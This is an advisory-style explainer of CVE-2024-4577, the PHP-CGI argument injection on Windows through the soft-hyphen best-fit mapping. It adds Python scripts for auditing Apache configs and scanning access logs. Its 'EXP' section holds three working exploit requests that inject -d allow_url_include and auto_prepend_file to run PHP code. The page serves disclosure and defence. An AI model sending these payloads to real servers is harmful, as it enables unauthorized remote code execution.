
PHP CGI RCE (CVE-2024-4577)

The PHP programming language, during its design, neglected the Best-Fit character encoding conversion feature inherent in Windows operating systems. This oversight allows unauthenticated attackers to bypass protections from the old CVE-2012-1823 by using specific character sequences to perform attacks such as parameter injection, subsequently executing arbitrary code on remote PHP servers.

Scope of Impact

This vulnerability affects all PHP versions installed on Windows operating systems. For detailed information, refer to the list below:

  • PHP 8.3 < 8.3.8

  • PHP 8.2 < 8.2.20

  • PHP 8.1 < 8.1.29

How to Determine if You Are Vulnerable to Attack?

For common setups involving the Apache HTTP Server combined with PHP, website administrators can confirm whether their server is vulnerable by checking the two scenarios described below. Notably, Scenario Two is also the default setting during the installation of XAMPP for Windows, implying that all versions of XAMPP for Windows are inherently affected by this vulnerability.

At the time of writing this article, it has been verified that unauthorized attackers can execute arbitrary code on remote servers running Windows operating systems in the following language environments:

  • Traditional Chinese (Code page 950)

  • Simplified Chinese (Code page 936)

  • Japanese (Code page 932)

For Windows operating systems running in other languages (English, Korean, and Western European languages), PHP is used so widely that not every exploitable scenario can be listed and ruled out, so it is still recommended that users thoroughly inventory their assets, verify their usage scenarios, and update PHP to the latest version to ensure maximum security.

Evil Soft Hyphen

A soft hyphen (represented in HTML as &shy;) is an invisible character used to indicate an optional hyphenation point within a line of text. In web development, the soft hyphen is often used in long words or URLs to allow for automatic line breaks at the edge of the display without altering the actual content or meaning of the text.

What is the Common Gateway Interface?

The Common Gateway Interface (CGI) is a standard protocol that defines how web servers can interact with executable programs installed on a server that generate web pages dynamically. Such programs are called CGI scripts; they can be written in any programming language, including PHP.

In the context of PHP and web development, CGI acts as a bridge between the PHP script and the web server, allowing the server to pass data, like form inputs or request details, to the PHP script. The PHP script processes this data and sends back the generated HTML (or other data types) to the server, which then sends it to the client's browser.

Example:

So what?

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

One of them contains a soft hyphen (0xAD) and the other a real dash (0x2D).

While they both appear the same to you and me, they have vastly different meanings to the OS.

Best fit mapping

PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

Scenario One: Setting PHP to run under CGI mode in the Apache httpd configuration file

When HTTP requests are directed to the PHP-CGI executable using the Action directive, this setup is affected by the vulnerability. Common configurations include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario Two: Exposing the PHP executable to the public (Default installation setting in XAMPP)

Even if PHP is not configured to run under CGI mode, simply exposing the PHP executable in the CGI directory also subjects it to this vulnerability. Common situations include, but are not limited to:

  • Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.

  • Exposing the PHP installation directory externally through ScriptAlias, such as:

ScriptAlias /php-cgi/ "C:/xampp/php/"
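The following Python script is an added example for auditing the two scenarios above; it is not part of the original page, of PHP, or of XAMPP. It reads an Apache httpd configuration as text and reports directives that match Scenario One (an Action directive that hands requests to php-cgi.exe or php.exe, or a SetHandler for application/x-httpd-php-cgi) or Scenario Two (a ScriptAlias whose target directory looks like a PHP installation, or a PHP executable copied into a CGI directory). The configuration fragments and directory listing are constructed for the example, and treating any ScriptAlias target containing "php" as the PHP directory is a heuristic of this script, not a rule from the page.

```python
import re

# Constructed Apache httpd configuration fragments that mirror the two
# vulnerable scenarios on the page, plus one safe layout. They are examples,
# not copied from any real server.
SCENARIO_ONE_CONF = """
AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"
"""

SCENARIO_ONE_ALT_CONF = r"""
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
"""

SCENARIO_TWO_CONF = """
# XAMPP-style default: the whole PHP install directory is served as CGI
ScriptAlias /php-cgi/ "C:/xampp/php/"
"""

SAFE_CONF = """
# PHP loaded as an Apache module; nothing is routed to php-cgi.exe
LoadModule php_module "C:/php/php8apache2_4.dll"
AddHandler application/x-httpd-php .php
# ScriptAlias /php-cgi/ "C:/xampp/php/"
"""

# Matches php.exe and php-cgi.exe in any letter case
PHP_EXECUTABLE = re.compile(r"php(?:-cgi)?\.exe", re.IGNORECASE)


def audit_httpd_conf(conf_text: str) -> list[str]:
    """Return one finding per directive that matches Scenario One or Scenario Two."""
    findings = []
    for lineno, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # ignore comments and blank lines
        if not line:
            continue
        directive, _, args = line.partition(" ")
        directive = directive.lower()
        args = args.strip()
        if directive == "action" and PHP_EXECUTABLE.search(args):
            findings.append(f"line {lineno}: Scenario One - Action hands requests to {args}")
        elif directive == "sethandler" and "x-httpd-php-cgi" in args.lower():
            findings.append(f"line {lineno}: Scenario One - SetHandler routes .php files to the CGI handler")
        elif directive == "scriptalias":
            match = re.match(r'(\S+)\s+"?([^"]+?)"?$', args)
            # Heuristic (assumption of this example): a ScriptAlias target whose
            # path contains "php" is treated as the PHP installation directory.
            if match and "php" in match.group(2).lower():
                findings.append(
                    f"line {lineno}: Scenario Two - ScriptAlias {match.group(1)} exposes {match.group(2)} as CGI"
                )
    return findings


def audit_cgi_bin(entries: list[str]) -> list[str]:
    """Flag PHP executables copied into a CGI directory (the other Scenario Two case)."""
    return [name for name in entries if PHP_EXECUTABLE.fullmatch(name)]


if __name__ == "__main__":
    for label, conf in [("one", SCENARIO_ONE_CONF), ("one-alt", SCENARIO_ONE_ALT_CONF),
                        ("two", SCENARIO_TWO_CONF), ("safe", SAFE_CONF)]:
        print(label, audit_httpd_conf(conf) or "no findings")
    # Constructed cgi-bin listing for the example
    print("cgi-bin", audit_cgi_bin(["printenv.pl", "php-cgi.exe", "test-cgi"]))
```

The page's own remedy is to update PHP to a fixed version. Until that is done, every line the audit reports is a place where the PHP executable is reachable over HTTP, so removing that Action or ScriptAlias line (or the copied executable) takes it out of reach.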

Different types of EXP

EXP 1

SSRF

http://PhpVulnEnv/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 2

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv

<?php phpinfo();?>

EXP 3

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv
REDIRECT-STATUS: XCANWIN

<?php phpinfo();?>
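To make the best-fit mapping concrete and to show how a defender can spot the EXP requests above in Apache access logs, here is an added Python example; it is not code from the page, from PHP, or from Apache. It models the single mapping the page describes (the soft hyphen byte 0xAD being read as the hyphen 0x2D), builds argv from a query string the way a CGI server does, and flags arguments that would pass a check for a leading "-" yet become an option after best-fit mapping. The real Windows best-fit tables for code pages 932/936/950 map more characters than this one byte, the log format and regular expression are assumptions of the example, and the access-log lines (clients, timestamps, sizes) are constructed; only their query strings are taken from EXP 2 and EXP 3 above.

```python
import re
from urllib.parse import unquote_to_bytes

# The one best-fit mapping the page describes: the soft hyphen byte 0xAD is
# treated as an ASCII hyphen 0x2D. Windows' real best-fit tables are larger;
# this set is a deliberate simplification and an assumption of this example.
BEST_FIT_TO_HYPHEN = {0xAD}


def best_fit(arg: bytes) -> bytes:
    """Model what PHP on Windows ends up seeing: best-fit bytes become '-'."""
    return bytes(0x2D if b in BEST_FIT_TO_HYPHEN else b for b in arg)


def split_cgi_args(query: str) -> list[bytes]:
    """Build argv the way a CGI server does (RFC 3875 section 4.4): split the raw
    query string on '+', then percent-decode each piece. Decoding to bytes keeps
    non-UTF-8 bytes such as 0xAD intact."""
    return [unquote_to_bytes(piece) for piece in query.split("+") if piece]


def smuggled_options(query: str) -> list[bytes]:
    """Return argv entries that do not start with a real hyphen (so a check for a
    leading '-' lets them through) but do start with one after best-fit mapping."""
    found = []
    for raw in split_cgi_args(query):
        if raw.startswith(b"-"):
            continue  # a literal '-' is what the existing hyphen check already rejects
        mapped = best_fit(raw)
        if mapped.startswith(b"-"):
            found.append(mapped)
    return found


# Common Log Format request line: client identd user [time] "METHOD target PROTO" status
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)

# Constructed access-log lines (clients, timestamps and sizes are invented);
# the two php-cgi.exe requests reuse the EXP 2 and EXP 3 query strings from the page.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Jun/2024:10:15:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
    '203.0.113.5 - - [07/Jun/2024:10:15:02 +0000] "POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Jun/2024:10:15:03 +0000] "GET /search.php?q=soft-hyphen HTTP/1.1" 200 2048',
    '203.0.113.5 - - [07/Jun/2024:10:15:04 +0000] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1" 200 512',
]


def scan_access_log(lines: list[str]) -> list[dict]:
    """Report requests whose query string carries best-fit-smuggled options."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        options = smuggled_options(query)
        if options:
            hits.append({
                "client": m.group("client"),
                "path": path,
                "options": [o.decode("latin-1") for o in options],
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["client"]} -> {hit["path"]} smuggled {hit["options"]}')
```

The check deliberately looks at what the argument becomes after mapping rather than at the literal "%ad" text, so it keeps working if a request encodes the byte differently; a rule that only matches the string "%ad" is simpler but narrower.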

Demo

Interview Question

1) Why is XAMPP the most affected in this CVE?

2) What is best-fit mapping, and how does it cause this vulnerability?

3) Which setting do you have to modify to fix this issue?

Author

Reference


Query strings are parsed and passed to the PHP interpreter on the command line: a request such as http://host/cgi.php?foo=bar might be executed as php.exe -cgi.php foo=bar
DEVCORE: Security Advisory: PHP Remote Code Execution (CVE-2024-4577) - PHP CGI Argument Injection Vulnerability
https://mp.weixin.qq.com/mp/wappoc_appmsgcaptcha?poc_token=HFj3amajFr1bUBstRri7lGhHA70Gus9G7sywHr1p&target_url=https%3A%2F%2Fmp.weixin.qq.com%2Fs%2F93TuxZ4AVqHXcnJw3M4hRg
watchTowr Labs Blog: No Way, PHP Strikes Again! (CVE-2024-4577)